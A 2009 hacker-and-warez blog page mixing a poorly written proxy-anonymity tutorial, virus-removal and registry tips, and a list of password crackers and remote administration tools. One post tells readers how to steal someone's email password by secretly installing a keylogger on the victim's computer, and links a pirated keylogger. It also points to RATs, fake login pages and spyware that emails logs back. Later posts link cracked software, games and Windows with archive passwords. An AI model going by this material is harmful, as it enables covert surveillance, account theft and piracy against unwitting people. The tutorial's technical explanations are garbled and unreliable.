Tuesday, June 30, 2009

Anonymous on the web

[----Stay anonymous on the web------]

This tutorial will teach a average day user how to keep all his
Esentual info limited so attacks from Hackers cant be made



The topics..
1.What are packets.
2.Getting a http proxy.
3.How http proxy work.
4.How to secrure http packets.
5.How to edit what o's and mozilla info send.
6.Getting a socket proxy.
7.How socket proxy work.
8.Cookies.
9.Final note.



1.What are packets.



Packets are very simple on the net There are millions of user's now for
secrurity and other reasons there must be ways of establishing difference
between user's Thus is done by packets, Packets are used when ever u connect
to a remote server/system Its identify's who is connecting.
An example of a http packet.( [Connect from MAx.mpd.com]
[206.14.13.32] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 2008 at 14:34:45 )
Now ill tell u what it is saying if u dont know.
*Note*(Http packets is the way u are sending info through the web
browser whenever u connect to a server/mechine/site )
[connected from MAx.mpd.com]-This is my host
[206.14.13.32]- is my ip
(Mozilla/4.05)- is the version of mozilla im using
(X11;I;Linux 2.0.32 i586)- Is The O's(operating system) And version of
the o's am running
[On december 2, 2008 at 14:34:45] - is day/year/time
Now u know how it works this is one way Hackers get all the info they
need on your computer to hack it.
Now we don't want this anymore Thus anonymous proxies where invented to
give keep user's on the net secure.Using anonymous proxies is nt
100% secure as the hacker can still do means on getting your real
ip/host/os ill talk about that later but it makes it very hard for a hacker
to get your ip/host once behind a proxy.
Now http is nt the only means of packets there are also socket packets which
ill talk about later.

2.How http proxy work.


A http proxy works like server it is actually and what it does is when
setup in your browser when ever u want to go to sites.It will connect
to there proxy server first then the proxy server connects to the site
u want to go to THus leaving no evidence of u on the site just the
proxy server.(Dont worry once u setup a proxy don't think u always have
to type in the proxy in first then go to there and type the site u want
too go to. :)It dont work like that once u have entered the proxy settings
in ya browser it will auto do the proxy for u all u have to do is surf the
net.(Setting up a http proxy discussed later)

3. Getting a http proxy


Http proxies are very easily found on the net as there are many
commited Http proxy server's around that are free.
Ill give a list of some http proxies for your all sorry if your
country proxy isn't here just search on the net for (Http proxy)
and ull find one.
***Austria*** Port

cache02.netway.at :80
mail.ppl.co.at :8080
speth08.wu-wien.ac.at :8080
pong.ping.at :8080

***Australia***
proxy.gwbbs.net.au :80
chrome.one.net.au :8080
proxy.newave.net.au :8080
ws.edi.com.au :80
mimas.scu.edu.au :80
proxy.omcs.com.au :8080
jethro.meriden.pas.com.au:8080
albany.jrc.net.au :80
basil.acr.net.au :8080

***Belgium***

cache-mar.belbone.be :80

***Bulgaria***

conan.gocis.bg :8080

***Brazil***

200.250.14.5)ct-nt-02.cybertelecom.com.br :8080
sanan.com.br :8080

***Canada***
proxy.collegemv.qc.ca :8080
srvprx.cspaysbleuets.qc.ca :80
valliere.csvalliere.qc.ca :80
keeper.albertc.on.ca :8080
cproxy1.justice.gc.ca :80
proxy.cslouis-hemon.qc.ca :8080
gateway.kwantlen.bc.ca :80

***Switzerland***

cache1.worldcom.ch :8080
cache2.worldcom.ch :8080
cache3.worldcom.ch :8080
web-cache-2.cern.ch :80
proxy.span.ch :8080
gip-lausanne-nc.globalip.ch :80
gip-lausanne-cf2.globalip.ch :8080
gip-lausanne-cf1.globalip.ch :8080
proxy2.iso.ch :8080
proxy.iprolink.ch :80

***China***

proxy.szptt.net.cn :8080

***United States***

hpux.mesd.k12.or.us :8080
gatekeeper.ci.slc.ut.us :8080
episd.elpaso.k12.tx.us :8080
svc.logan.k12.ut.us :8001
proxy.eup.k12.mi.us :8080
svc.nues.k12.ut.us :8001
proxy.eup.k12.mi.us :8080
(207.78.252.100)oakweb.oak-web.washington-ch.oh.us :80
homnibus.nvc.cc.ca.us :80
et.mohave.cc.az.us :80

(ok id say i gave out example if ur local country not there go search
the net and if cant find use another country one that is close to u)

4.How to secrure Http packets


Like i said before this is a normal http packet
( [Connect from MAx.mpd.com]
[206.14.13.32] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 1998 at 14:34:45 )
Now to Make your ip and host anonymous to web browsing we are going to
use http proxy with ya browser.THis is done by going to ya options
and finding the info on proxy settings in thus put in all
avaliable places in proxy setting etc.ftp,http,security,
Except leave sockets part blank THis isnt a socket proxy its a http
Now after setting up a proxy in the proxy settings and putting in the
port too.Our new packets will look like this.
( [Connect from The_proxies_host]
[The_proxies_ip] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 2008 at 14:34:45 )
Now u might be thinking cool :) No longer have evidence of me on there
server but dam they know my o's and version of mozilla later on ill
discuss how to change that.U might also be thinking WOW now i can surf
100% secure on the net.U are not totally right.IF a hacker had a real
grunge on u.He has now the proxy u are using there ip/host
now if he wants to get your info that badly he would have to hack
the proxy server compare the log time of the time u logged to the hacker's
site too the logs of your connection to the proxy server.THus is a real
big job and if pick a good proxy server they will be very secure from
attack's So your prity much safe.

5.How to edit the o's and mozilla info send.



Ok if your using IE this is how u would do it.
To see Original Settings
GOTO HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
User Agent = Mozilla/4.0 (compatible; MSIE 4.01; Windows 95; (Your Orginial Settings))

(Skip this Part here)
GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
ProductName = Microsoft Windows 95
Version = Windows 95


GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
(Your Orignial Settings Here) = IEAK(Your Orignial Settings Here)

Example

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
Myth [Unix-Base] = IEAKMyth [Unix-Base]


*Note (this info on how to change the mozilla and version shown was
given to me from Myth i didn't make it.)

6.Getting a socket proxy.



Ok now socket proxies work like Http proxies the only diff is
socket proxies are used with programs like (icq,mirc) And the packets
are send through sockets not http.Getting a socket proxy is alot harder
because Socket proxy server's have to be dedicated to a certain program
so its very limiting to the amount of user's he will get.
Http is always used its using the web everyone uses it so http proxies
are always going to be in need.
TO find a socket proxy u can search the net typing in (Socket proxy)
or try for certain program's names like (Icq proxy).
Hopefully u will get one
socket proxies are useful as alot of attacks on user's are done
by kids with nukes,spring,ping,smurf,etc etc And thus will anoy a user
in mirc or from icq both these programs give any user possibility to
get a user's ip/host.
that's why if u use these u will want a socket proxy.
Alot of people go why dont u just use ident or jizz or something
for mirc and icq.Well the reason u don't as there are expolits out
there to crash spoofed hosts/ip for programs like jizz and ident
a proxy is more stable way and more prevention then a spoofer program.
With these programs its explains once u get a socket proxy how to set
them up in them so i dont have to go and explain for u.Because its
different for all programs Socket is also used in web downloading/surfing
but not to worry u can find alot of socket proxies for web downloading/surfing
around.

7.How a socket proxy works.



I just explained it briefly in last topic.
Ill go into a bit more detail
see when ever u send or recieve a file for a server/user
it has to send through a socket.Now when they do this it has to establish
a connection to your computer.Example if a connection
( established a connection on MAx.mpd.com port 1030 )
And thats not all it will log on the computer what day/year/time
u established a connection.This is another way hackers get info on u
Thats why u need a socket proxy.

8.Cookies.


Ok cookies are also apart of way info is send from your server/isp
to your computer cokies transmits info on webpages visited by u
info on what u have downloaded and so forth with a ip/host and day/
year/time .Now hackers can use this hack for 2 reasons
1.Get info they need to attack u
2.Be able to see all places u have been/done on web/send files through
to your computer without u even knowing it.
Now With all browsers now u can stop even limit cookies from the oriene
of your server.Go to your options u will find something on cookies
there in ya browser.
Now this is very limiting so if ya a linux/unix user there is a nice
little program i know that will go that few steps furture.
Visit. (http://www.lne.com/ericm/cookie_jar/)
THis program called "Cookie jar" alows u to limit sites from your computer
limit if u get cookies from that site/server its goes the extra steps
u need.

9.Final note.



Rember dont use this secruity for hacking almost all proxy server's
will give the cops/server's your info if they find u tryed to hack with
there anonymous proxy settings.Only use this to stops attacks against u
and your server.

Continue Reading......

Sunday, June 28, 2009

Thank you!!

Thank You for Contacting us we Will reach you ASAP!






★✌ČŶBĔRŤŔŐŃ✌★




Subscribe to ★✌ČŶBĔRŤŔŐŃ✌★ by Email

Continue Reading......

Contact Us




Subject: *
E-mail Address: *
Your Name *
Message

* RequiredBuild Your Own Contact Form










★✌ČŶBĔRŤŔŐŃ✌★









Subscribe to ★✌ČŶBĔRŤŔŐŃ✌★ by Email

Continue Reading......

Friday, June 26, 2009

USB Autorun Blocker – Prevent Virus Infection From Pen Drive



Trouble:

Most of the virus infections are caused due to virus spreading through pen drives, memory cards and other USB drives. Many of these viruses use autorun.inf viruses which cause the infection because of a small autorun.inf files which triggers the virus files on your pen drive.



When you double click on your USB pen drive icon to open the drive in windows explorer these autorun.inf files run the viruses files and copy them to your computer to cause virus infection.

in this post we will talk about a tool called “USB Autorun Blocker” to protect your computer from pen drive viruses.

Lets find out how does this tool protect your computer from autorun.inf viruses.

Fix:
USB Autorun Blocker is a very light program, low on eating system resources. It gets loaded automatically into system memory.

How does USB protects from viruses in USB pen drive?

When ever you connect a new drive to your computer which contains autorun.inf viruses, it automatically renames autorun.inf files on the device and changes the attribute of autorun.inf file to be normal and visible to the user.

As a result you can delete the autorun.inf files on the drive and also delete all other virus files on the USB drive, whose names are their in the autorun.inf files code.



Click here to download USB Autorun blocker


[How To Recover] Registry Editing Has Been Disabled By Your Administrator



Here are two ways to enable the registry editing in Windows.

1- From Group Policy Editor

Go to Run –> gpedit.msc

In the left hand menu, go to User Config –> Administrative Templated –> System.

Now In the right hand pane, select “Prevent access to registry editing tools”. It will probably be not configured or enabled. If it’s enabled, disable it and if it’s not configured, first enable it, apply settings and then disable it. Most probably the settings have been applied instantly. If not, then run gpupdate in command prompt to apply the group policies.

2- From the Run Menu

I got this tweak while surfing the internet. Go to Start –> Run, copy and paste the follow in the Run box and press OK.

1.REG add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f

The effects are usually instant. If not then you should see the results after restarting your computer.


[How To Remove] ntde1ect.com And autorun.inf Files



There is a Trojan/virus (either the Win32/Pacex virus or the Win32/PSW.Agent.NDP trojan) that uses the two files ntde1ect.com and autorun.inf. Here is how you can get rid of them :

* Open Task Manager and in Processes tab end explorer.exe and wscript.exe process
* Open up File –> New Task (Run) in the Task manager
* Type cmd and hit Enter
* Type

del /a:h /f c:autorun.*

* Go to your WindowsSystem32 directory by typing

cd c:windowssystem32

* Type

dir /a:h /f avp*.*

* If you see any files names avpo.dll or avpo.exe or avpo.exe, use the

Del /a:h /f avpo.exe

* Open up File –> New Task (Run) in the Task manager, Type

regedit

* Navigate to

HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun

* If there are any entries for avpo.exe, delete them.
* Do a complete search of your registry for ntdelect.com and delete any entries you find.
* To Restore Folder Options Settings, Navigate to

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL

Look at the “CheckedValue” key. This should be a DWORD key. If it isn’t, delete the key. Create a new key called “CheckedValue” as a DWORD (hexadecimal) with a value of 1. The “Show hidden files & folders” check box should now work normally.

Continue Reading......

Virus removing Techniques

New Folder.exe removal tool



download:
code:
http://www.od3n.net/download/?dl_id=1

Task Manager Has Been Disabled By Your Administrator



Here is solution from the Microsoft article about enabling the task manager :

Enabling Task Manager from Group Policy Editor
1. Go to “Start” -> “Run” -> Write “Gpedit.msc” and press on “Enter” button.
2. Navigate to “User Configuration” -> “Administrative Templates” -> “System” -> “Ctrl+Alt+Del Options”
3. In the right side of the screen verity that “Remove Task Manager”” option set to “Disable” or “Not Configured”.
4. Close “Gpedit.msc” MMC.
5. Go to “Start” -> “Run” -> Write “gpupdate /force” and press on “Enter” button.

Enabling Task Manager from Registry Editor
1. Go to “Start” -> “Run” -> Write “regedit” and press on “Enter” button.
Warning: Modifying your registry can cause serious problems that may require you to reinstall your operating system.
Always backup your files before doing this registry hack.
2. Navigate to the following registry keys and verity that following settings set to default :
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\]
“DisableTaskMgr”=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“DisableCAD”=dword:00000000
3. Reboot the computer.

Enabling Task Manager from the Run Menu

Go to Start –> Run and copy and paste the following and press OK.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f


USB pen drive detected but doesn't show up in My Computer



Trouble:

You may have faced a problem when you insert your pen drive and it gets detected very easily but it doesn’t show up as a drive icon in My Computer. The computer detects the pen drive but data on pen drive is not visible as the pen drive is not visible in My Computer (Explorer).

This problem occurs mainly when windows XP fails to allocate a drive letter to your portable drive(pen drive). It occurs mostly with new pen drives connected to your computer for the first time. If you face such problem then it may not be the pen drive’s fault, rather it may be windows trouble.

Fix:

You can fix this issue by following some simple steps given below.

1. Click Start, click Run, type compmgmt.msc, and then click OK.

2. In the console tree, click Disk Management. The Disk Management window will appear.

3. On this disk management window, you can see some drives including the portable drive. Right click on your portable drive and click change drive letter and paths.

4. Now a assign a new drive letter which is not being used by any of your drives in My Computer.

5. After assigning the new drive letter your portable drive will show up in my computer with other drives

i hope the above solution will help to fix this trouble.

Continue Reading......

Monday, June 22, 2009

Avast! Home Edition 4.8.1335



avast! antivirus Home Edition represents the best free antivirus protection currently available on the market. This edition is FREE OF CHARGE for non-commercial & home use. Its features include:

* Anti-spyware built-in
* Web Shield
* Anti-rootkit built-in
* Automatic updates
* Strong self-protection
* Virus Chest
* Antivirus kernel
* System integration
* Simple User Interface
* Integrated Virus Cleaner
* Resident protection
* Support for 64-bit Windows
* P2P and IM Shields
* Internationalization
* Network Shield

download
Code:
http://files.avast.com/iavs4pro/setupeng.exe

Free registration


avast! antivirus Home Edition is FREE to use but it is necessary to register before the end of the initial 60 day trial period. Following the registration you will receive by e-mail a license key valid for a period of 1 year. After you have downloaded and installed the program, the license key must be inserted into it within 60 days. The registration process is very easy, and it will take you only a couple of minutes.

Register here :

http://www.avast.com/eng/home-registration.php

Continue Reading......

Saturday, June 20, 2009

Essential Hacking Tools For Every Hacker

Here is a list of all the essential hacking tools that every hacker should possess.Here in this post I will give details of different Hacking/Security tools and utilities along with the download links.I have also divided these tools into their respective categories for ease of understanding.

NETWORK SCANNERS AND TCP/IP UTILITIES

1. IP TOOLS

IP-Tools offers many TCP/IP utilities in one program. This award-winning program can work under Windows 98/ME, Windows NT 4.0, Windows 2000/XP/2003, Windows Vista and is indispensable for anyone who uses the Internet or Intranet.

It includes the following utilities
* Local Info - examines the local host and shows info about processor, memory, Winsock data, etc.
* Name Scanner - scans all hostnames within a range of IP addresses
* Port Scanner - scans network(s) for active TCP based services
* Ping Scanner - pings a remote hosts over the network
* Telnet - telnet client
* HTTP - HTTP client
* IP-Monitor - shows network traffic in real time & many more

IP TOOLS has almost all the utilities built into it.So there is no need to use seperate tools for every indivisual process of hacking such as Port scanning,Whois scanning,IP monitor etc.It's like a hacking tool kit which has all the necessary tools for hacking.
Download IP Tools Here
Code:
http://www.ks-soft.net/ip-tools.eng/downpage.htm

2. NMAP


Nmap is a similar hacking/security tool as IP Tools which offer slightly different set of features.Unlike IP Tools Nmap is a freeware.It is designed to rapidly scan large networks, although it works fine against single hosts.Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available
Download Nmap Here
Code:
http://www.insecure.org/nmap/download.htm

PASSWORD CRACKERS


1. LC4 (For Windows Password Recovery)
LC4 is the award-winning password auditing and recovery application, L0phtCrack. It provides two critical capabilities to Windows network administrators:

* LC4 helps administrators secure Windows-authenticated networks through comprehensive auditing of Windows NT and Windows 2000 user account passwords.

* LC4 recovers Windows user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.

Donload LC4 Here
Code:
http://www.net-security.org/software.php?id=17

2. SAMINSIDE (For Windows Password Recovery)


SAMInside is designated for the recovery of Windows NT/2000/XP/2003/Vista user passwords.
The following are some of the highlighting features of Saminside.

* The program doesn't require installation.It can be directly run from CD,Disk or Pendrive.
* Includes over 10 types of data import and 6 types of password attack

1. Brute-force attack
2. Distributed attack
3. Mask attack
4. Dictionary attack
5. Hybrid attack
6. Pre-calculated tables attack

* Run's very fast since the program is completely written in assembler.

As far as my opinion is concerned both LC4 and SAMINSIDE are powerful password crackers for cracking Windows Passwords.However LC4 has slightly upper hand over Saminside.I recommend LC4 for advanced users but Saminside is more suitable for novice users.
You Can Get Saminside From Here
Code:
http://www.insidepro.com/

3. MESSENPASS

(For Instant Messenger Password Recovery)
Messenpass is a password recovery tool for instant messengers.It can be used to recover the lost passwords of yahoo messenger or windows messenger.It is too easy to use this tool.Just double-click this tool and it reveals the username and passwords that are stored in the system.
Download MessenPass Here
code:
http://www.nirsoft.net/utils/mspass.html

REMOTE ADMINISTRATION TOOLS (RAT)


RADMIN
Radmin (Remote Administrator) is the world famous, award winning secure remote control software and remote access software which enables you to work on a remote computer in real time as if you were using its own keyboard and mouse.
Radmin has the following features.
http://i31.tinypic.com/drdtsi.jpg
* Access and control your home and office computer remotely from anywhere
* Perform systems administration remotely
* Provide Help Desk (remote support) functions for remote users
* Work from home remotely
* Manage small, medium, and large networks remotely
* Organize online presentations and conferences
* Share your desktop
* Teach and monitor students' activities remotely


I have used Radmin personally and recommend this software to everyone.It works great!
Download Radmin Here
Code:
http://www.radmin.com/
Most of the above tools are shareware which means that you have to pay for them.But they are really worth for their money.Most of the time freewares offer limited functionality/features than the sharewares and hence I recommend them to my visitors.But still you can get 99% of all the softwares for free (cracked versions) on the internet and if u search on this site itself you will find almost all of the above mentioned softwares free :)

Continue Reading......

Basics Of Hacking(Start Hacking now!)

The most frequent questions asked by many people is How To Hack Yahoo Password or any other email account.So you as the reader are most likely reading this because you want to break into somebody's email account.Here are some of the tricks that can be used to track an email password.



THINGS YOU SHOULD KNOW BEFORE PROCEEDING

There is no program that will crack the password of victim's account.There exist many password hacking programs which claims to do this,but unfortunately people using these kind of programs will only end up in frustration.None of these programs work since services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts.Another thing you must know if you ask this question in any "hacker" chat room/channel, you hear that you have to email some address and in any way you give up your password in the process, in attempt to crack others password.So DO NOT BELEIVE THIS.

TWO WAYS OF HACKING METHODS THAT YOU CAN TRY

IF YOU HAVE ACCESS TO VICTIM'S COMPUTER

If you have physical access to victim's computer then it's definitely possible to crack his password.This can easily be done by just installing a

keylogger.



What is a keylogger? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer's keyboard.

A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim's password.OK we can crack passwords using a keylogger but these are the questions that arise in our mind now!

1.Where is the keylogger program available?

A keylogger program is widely available on the internet.some of them are listed below

Powered Keylogger
Advanced keylogger
Elite Keylogger
Handy Keylogger
Quick Keylogger
downlaod:
code:
http://rs111.rapidshare.com/files/140762082/Ardamax_Keylogger_v2.85_ProWarezHax.com.rar
Oops i think the above list is enough.There exists hundreds of such keyloggers available on the net.These are software keyloggers.There are also hardware Keyloggers available which can be directly attached to computer and can be used to sniff valuable data.These programs are none other than spyware! So use it @ your own risk.

2.How to install it?

You can install these keyloggers just as any other program but these things you must keep in mind.While installing,it asks you for a secret password and a hot key to enable it.This is because after installing the keylogger program is completely hidden and the victim can no way identify it.Keylogger is hidden from control panel,Program files,Start menu,Task manager so that it becomes completely invisible but runs in background monitoring the user activities.

3.Once installed how to get password from it?

The hacker can open the keylogger program by just pressing the hot keys(which is set during installation) and enter the password.Now it shows the logs containing every keystroke of the user,where it was pressed,at what time,including screenshots of the activities.

Some keyloggers also has a built in SMTP server.So once you install the keylogger on victim's computer you can just sit back in our place and receive the logs via email

4.Which keylogger program is the best?

According to me Elite Keylogger and Powered keylogger are the best.You can also read the features and side by side comparisions of them and select the best that suites your needs.

IF YOU DO NOT HAVE ACCESS TO VICTIM'S COMPUTER

Ofcourse the above method can only be employed if you can access victims computer.But what to do if we do not have access.In this case there exists many Remote Administration Tools commonly known as RATs available on net.Just try googling and you can get one.

OTHER WAYS OF HACKING PASSWORD



The other most commonly used trick to sniff password is using Fake Login Pages.For reference see the topic yahoo,gmail,orkut hacks in the Hackign tips nd Tricks catogeory.
This is where many people get cheated.A Fake Login page is a page that appears exactly as a Login page but once we enter our password there ,we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get an error "Page cannot be displayed".Many times we ignore this but finally we loose our valuable data.

Keyloggers (Keystroke Loggers)


Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

There are two types of keystroke loggers:

1. Software based and
2. Hardware based.

Spy ware: Spector (http://www.spector.com/)



* Spector is a spy ware and it will record everything anyone does on the internet.
* Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.
* Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.

Hacking Tool: eBlaster http://www.spector.com/



# eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.
# eBlaster records their emails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own email address.
# Within seconds of them sending or receiving an email, you will receive your own copy of that email.

Hacking Tool: (Hardware Keylogger)

http://www.keyghost.com



* The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
* It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

Continue Reading......

Thursday, June 18, 2009

Titanic Passenger List (Scans of original Documents) BySkip






The ship set sail on April 10/ 1912 from South Hampton bound for New York.
These are scans of the original documents.

Download:
Code:http://rapidshare.com/files/241019667/Titanic_Passenger_List__Scans_of_original_Documents_.zip

Mindblowing Digital pics Dont miss it







http://rapidshare.com/files/129570898/WIDE_BY_AVINASH.rar.001
http://rapidshare.com/files/129576124/WIDE_BY_AVINASH.rar.002
http://rapidshare.com/files/129610856/WIDE_BY_AVINASH.rar.003

JOIN WITH HJ SPLIT

Continue Reading......

T-Shirt Design Kit - Complete package

T-Shirt Design Kit - Complete package



Product Information

Create custom T-shirts to advertise your business, or design T-shirts for family reunions, birthdays, office parties, sports clubs, and more! Choose from 100 pre-designed templates, or create your own! Customize your design with clip art from the 5,000 image collection included. Select from twenty True Type fonts to express yourself.
Just print your design on T-Shirt Transfer Paper (available at most hobby shops and office supply stores), and then iron it onto a T-Shirt and you’ve got a custom shirt just like that!
The T-Shirt Design Kit includes the following tools: Design Studio: Illustration and drawing tool for creating your own T-Shirt designs. Browser+: A graphics browser for organizing and viewing the 5,000 images that come with T-Shirt Design Kit.

PRODUCT FEATURES

* Choose from 100 pre-designed templates
* Create your own
* Customize your design with clip art from the 5,000 images on CD
* Select from 20 TrueType fonts

ADDITIONAL FEATURES

Design Studio contains many tools and options to help you create images:

* Menu bar: Contains all available commands, such as Open, Close, and Help. It also enables you to change Line and Fill options on the selected tool in the Tool Palette.
* Tool Palette: Tools enable you to Select objects, Type Text, Draw Shapes, Draw Lines, Transform, and Magnify images.
* Toolbar: Contains the most commonly used commands, such as Undo, Preview, Copy, and Paste.
* Color Palette: Enables you to select many different colors with which to work.
* Once you have created the image, simply click File and then Print to print the image on your T-Shirt Transfer Paper.

ADDED BONUS

T-Shirt Design Kit also included Page Express Lite FREE! This is a full-featured drawing program that lets you create original T-Shirt designs or virtually any type of design work you can imagine. Just print your design on T-Shirt transfer paper and then iron it onto a T-Shirt and you've got a custom shirt just like that!

KEY BENEFITS

* Sport teams
* Family reunions
* Birthday parties
* Office parties
* and more!

SYSTEM REQUIREMENTS

* Windows 3.1/95/98/Me
* 486 or higher PC
* 8MB of RAM
* 10MB free hard disk space
* CD-ROM drive
* SVGA graphics
* Mouse
* Ink Jet Printer

TIPS FOR WINDOWS XP USERS
Code:

http://www.gatewaytobeauty.com/software/xp_users.htm


TIPS FOR WINDOWS VISTA USERS
Code:

http://www.gatewaytobeauty.com/software/vista_users.htm

Code:
http://rapidshare.com/files/243826142/t-shirt_Design_Kit_CW.part1.rar



http://rapidshare.com/files/243828519/t-shirt_Design_Kit_CW.part2.rar


Code:

zoop@CW


TuneUp Utilities 2009 v8.0.3100.31 Final




http://i42.tinypic.com/2wbs28m.jpg

Highlights of TuneUp Utilities 2009

The complete tuning solution for your PC
With TuneUp Utilities, your system will be faster, more comfortable and more secure. All important aspects of system configuration, security, cleanup and maintenance can be accessed through a modern graphical interface.

TuneUp Utilities will optimize the performance of your PC, solve problems and help you easily customize your computer to suit your needs.

TuneUp Utilities helps both beginners and experts to make Windows meet their needs in a way that is better, easier and safer. All important system options are explained in an easy way and can be turned on or off at the click of your mouse. TuneUp Utilities will then make the necessary changes in the registry or boot files automatically. We place a high value on system stability, so that Windows won't stop working reliably. And most changes that you make can be undone in TuneUp Rescue Center - easily and safely.

TuneUp Utilities also gives you many more options. In addition to helping you make Windows "better looking", you can also clean up and optimize your system at the click of a mouse. TuneUp Utilities 2008 will clean up unnecessary data from your hard disk and remove unnecessary entries from your registry. It can defragment your hard disk and registry and optimize your system settings to make Windows run substantially faster. Most of this maintenance is performed automatically every week by TuneUp 1-Click Maintenance.

Automatic adaptation to your operating system
When making these changes, TuneUp Utilities reaches deep into the Windows system. However, Windows has changed a great deal from version to version. Because of this, the software automatically recognizes and adapts to each supported version of Windows. This is done automatically so that you, the user, won't have to re-learn the software for each operating system version
link:
Code:

http://rapidshare.com/files/243361569/TuneUp_Utilities_v8.0.3100.31__CW.rar

pass:
Code:

zoop@CW

Continue Reading......

Wednesday, June 17, 2009

Hummer






Game Info

:
4x4 Hummer is an off road driving simulation where players can test drive a range of General Motors’ sports utility vehicles (SUV’s) across challenging and exciting locations including the Grand Canyon, Crimea, Egypt and Iceland to name a few. There is a range of great off road vehicles from the General Motor’s stable for building off road drivers to test. Players can try their hand at driving the Hummer H2 SUT, Hummer H2 SUV, Hummer H3 SUV and Hummer H1 Alpha along with Saab 9-7x SUV, Cadillac Escalade, Chevrolet Tahoe, Chevrolet Trailblazer GMC Envoy and GMC Yukon. Players have full control over all the vehicle’s 4x4 features such as the 4x4 gear box, GPS navigation, center differential locking, towing devices, height controls and tyre pressure as they challenge their driving skills across some of the world’s most demanding terrain.

DownLoad Links:

Code:
http://hotfile.com/dl/5388284/d94bbe2/4x4_Hummer_CW.part1.rar.html
http://hotfile.com/dl/5388263/719bab3/4x4_Hummer_CW.part2.rar.html
http://hotfile.com/dl/5388506/393f5aa/4x4_Hummer_CW.part3.rar.html
http://hotfile.com/dl/5388233/70fcc35/4x4_Hummer_CW.part4.rar.html
http://hotfile.com/dl/5388551/4ae0cae/4x4_Hummer_CW.part5.rar.html
http://hotfile.com/dl/5388471/9a5e10f/4x4_Hummer_CW.part6.rar.html
http://hotfile.com/dl/5388351/ffa122f/4x4_Hummer_CW.part7.rar.html
http://hotfile.com/dl/5383619/1727ab1/4x4_Hummer_CW.part8.rar.html

PassWord:

Code:

Pirate!@CW



Driver Parallel Lines RIP [840 MB]





The fourth edition of the genre-defining action/driving game by Reflections Interactive, this new edition is set in New York City and features an open mission structure unfolding a story of doublecross and revenge set over 2 distinct eras of New York City.

Whats Ripped??
Musics and Videos, other langs, english language included

Download:
http://hotfile.com/dl/4176196/c1567b...art01.rar.html
http://hotfile.com/dl/4176332/4337be...art02.rar.html

http://hotfile.com/dl/4176429/e584be...art03.rar.html

http://hotfile.com/dl/4176534/a3f217...art04.rar.html

http://hotfile.com/dl/4176629/698cd8...art05.rar.html
http://hotfile.com/dl/4176661/a9e0d2...art06.rar.html

http://hotfile.com/dl/4176707/664b08...art07.rar.html

http://hotfile.com/dl/4176743/bdd930...art08.rar.html

http://hotfile.com/dl/4176768/8bca09...art09.rar.html

Installation Notes:

1). Unrar and extract inf.parallel.lines.zip and run setup.exe.



Counter-Strike 1.6 Non-Steam + Patch + Works Online






Counter-Strike 1.6 Non-Steam + Patch
*Tested and 100% WORKING!


Counter-Strike 1.6 v6 Setup (120MB) :
no addons needed

DOWNLOAD:

http://hotfile.com/dl/4681599/b9e9003/CW_Counter_Strike_-_Portable_(100_Work_Online)_no_addons_need.rar.html

pass:
Code:
cyberneedz.info

Continue Reading......

Windows XP Professional Corporate SP3 Final



- This version is Corporate so it won't require a Serial Number Wink
- It is Genuine , it passes all WPA tests and you can update through Windows Update.
- It included all known updates until NOV 2008

More details:

This is Windows XP Professional SP3 which includes all critical updates till October 2008.
It does not requires any cracks or tools to pass the validation.
This is an untouched version of Windows XP Professional SP3

-No Password.
-Extract .rar files to .iso using Winrar
-Proceed to burn this .iso file to a blank CD using Poweriso, Alcohol 120 at medium speed.
-Then You have a Bootable CD.
-Install fresh copy of Windows XP by formatting your hard drive C:\.
-Register with the key provided.
-Use and enjoy a lifetime genuine Windows XP SP3
Code:

http://rapidshare.com/files/164709324/WXPCorSP3_Offl_Ed.part1.rar
http://rapidshare.com/files/164709700/WXPCorSP3_Offl_Ed.part2.rar
http://rapidshare.com/files/164709414/WXPCorSP3_Offl_Ed.part3.rar
http://rapidshare.com/files/164709809/WXPCorSP3_Offl_Ed.part4.rar
http://rapidshare.com/files/164709819/WXPCorSP3_Offl_Ed.part5.rar
